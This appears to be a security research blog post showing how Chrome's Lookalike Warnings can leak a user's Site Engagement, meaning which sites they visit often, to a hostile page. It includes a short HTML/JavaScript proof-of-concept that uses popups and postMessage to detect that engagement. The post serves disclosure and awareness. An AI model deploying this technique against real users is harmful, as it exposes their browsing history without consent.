October 19, 2023

Demo: Chrome Site Engagement Feature Can Leak Frequently Visited Sites

Understanding the Potential Privacy Implications of Lookalike Warnings in Chromium

In this article, we will explore two lesser-known features in Chromium: Lookalike Warnings and Site Engagement. We will explain how these features can leak frequently visited or engaged sites to untrustworthy websites.

Site Engagement

In Chrome, every profile lists websites the user frequently visits and interacts with. As the Chromium documentation says,

The Site Engagement Service provides information about how engaged a user is with a site. The primary signal is the amount of active time the user spends on the site but various other signals may be incorporated.

The documentation further lists that the engagement score is increased based on factors like scrolling, clicking, keypresses, media playback, or adding a website to the home screen.

It's also important to note that site engagement is copied from the original session into incognito sessions. However, no information flows from the incognito session to the original session.

You can inspect the current site engagement by navigating to chrome://site-engagement.

As per available information, site engagement can not be disabled and is also available in other Chromium-based browsers like Edge, Brave, or Vivaldi.

Lookalike Warnings

Chrome 75 introduced an on-by-default safety feature to protect users from social engineering attacks by malicious websites that impersonate other websites.

This feature called "Lookalike" Warnings uses various heuristics to detect such websites. As a result, Chrome might show two types of warnings: a full-page display for high-confidence warnings or popups for low-confidence warnings.

Examples of lookalike warnings

Whether a high-confidence or low-confidence warning is displayed to the user depends on the analyzed heuristics and how similar the visited website is to other popular or frequently visited websites.

To understand Chrome's internal decision-making, we have to look at the LookalikeUrlService implementation, specifically the LookalikeUrlService::CheckUrlForLookalikes function and the utility functions implemented in components/lookalikes/core/lookalike_url_util.cc.

We can conclude that Chrome is searching for well-known patterns to determine whether a website the user navigated to resembles a popular domain or a website with a high engagement score. The list of popular domains is embedded into Chromium and separated into a "top bucket" containing the top 489 websites and other popular domains, totaling 4990 domains (when writing this article).

As per the documentation, the different patterns that Chrome looks for include:

  • Domains that are a small edit distance away from other domains, such as goog0le.com.
  • Domains that embed other domain names within their hostname, such as google.com.example.com.
  • Domains that use IDN homographs, such as goögle.com.

However, inspecting the source code reveals other methods, for example:

  • Domains that combine brand names with popular keywords like "account" or "login" such as google-login.com. Brand names are generated from websites with high engagement scores, in addition to a short hardcoded list.
  • Domains with a single character swap, such as googel.com.

Abusing Lookalike Warnings to Leak Site Engagement

An important detail is that Lookalike Warnings behave differently for different users to minimize false positive warnings.

Chrome only shows warnings on sites that the user has not used frequently. Further, Chrome will only recommend sites that are either well-known (i.e. top) sites, or the user has an established relationship.

Sites that show a warning to you may not show for another user, unless that user has visited the same sites that you have.

This means that a specifically crafted website name can be used to determine whether a user is engaged with a chosen site.

For example, navigating to app.slack.com.detection.site will display a high-confidence warning only to users engaged with app.slack.com.

Any website can initiate navigation by opening a new browser window with the detection website. This action requires user interaction, such as clicking a button; otherwise, the browser will block the popup window. However, a single popup window can be reused to test multiple websites, as the opener can repeatedly redirect the popup window to different locations.

The detection website can then send a post message to its opener, indicating that neither a high-confidence or low-confidence warning was shown:

<!-- https://example.com.detection.site#x -->

<!DOCTYPE html>
<html>
	<head>
		<script>
		function notifyParent() {
			window.opener.postMessage(null, "*")
		}
		</script>
	</head>
	<body>
		<input id="x" onfocus="notifyParent()">

If a low-confidence popup warning is triggered, the notifyParent() function will not be called because the lookalike warning prevents the onfocus event from running. Similarly, the function will not be called in the case of a high-confidence warning because it prevents the page from loading.

As described above, warnings will be triggered for engaged sites and top-bucket domains regardless of site engagement. Sometimes, this prevents reliably detecting engagement for domains from the top bucket. However, some of the detection methods only trigger for engaged websites and not all top-bucket domains. One example is brand names combined with popular keywords. For example, apple-login.com will trigger a low-confidence warning only if apple.com is engaged despite apple.com being a top-bucket domain.

This technique is prone to false positives in case of network errors or other reasons that prevent the detection site from loading. However, in most cases, it's reasonable to assume that it's because of Lookalike Warnings and, therefore, Site Engagement.

You can see this technique in practice on our demo page. Note that it's only a proof of concept with several limitations, and in its current state, it's only able to detect site engagement for domains outside of the top bucket.

Conclusion

Lookalike Warnings are arguably a great safety feature that protects users from common threats on the web. It's hard to balance effectiveness and good user experience, making Site Engagement a vital source of information. However, since disabling Site Engagement or Lookalike Warnings is impossible, we believe it's important to discuss these features' privacy implications. For some people, the risk of exposing their browsing history to a targeted attack might be far worse than being tricked by lookalike phishing websites. Especially given that site engagement is also copied into incognito sessions. We hope that by raising awareness about these technologies, individuals can better protect themselves with alternative means such as using guest profiles in Chrome. If you are interested in learning more about Fingerprint and the solutions we provide to businesses to prevent fraud, we encourage you to connect with our sales team.

All article tags

Share this post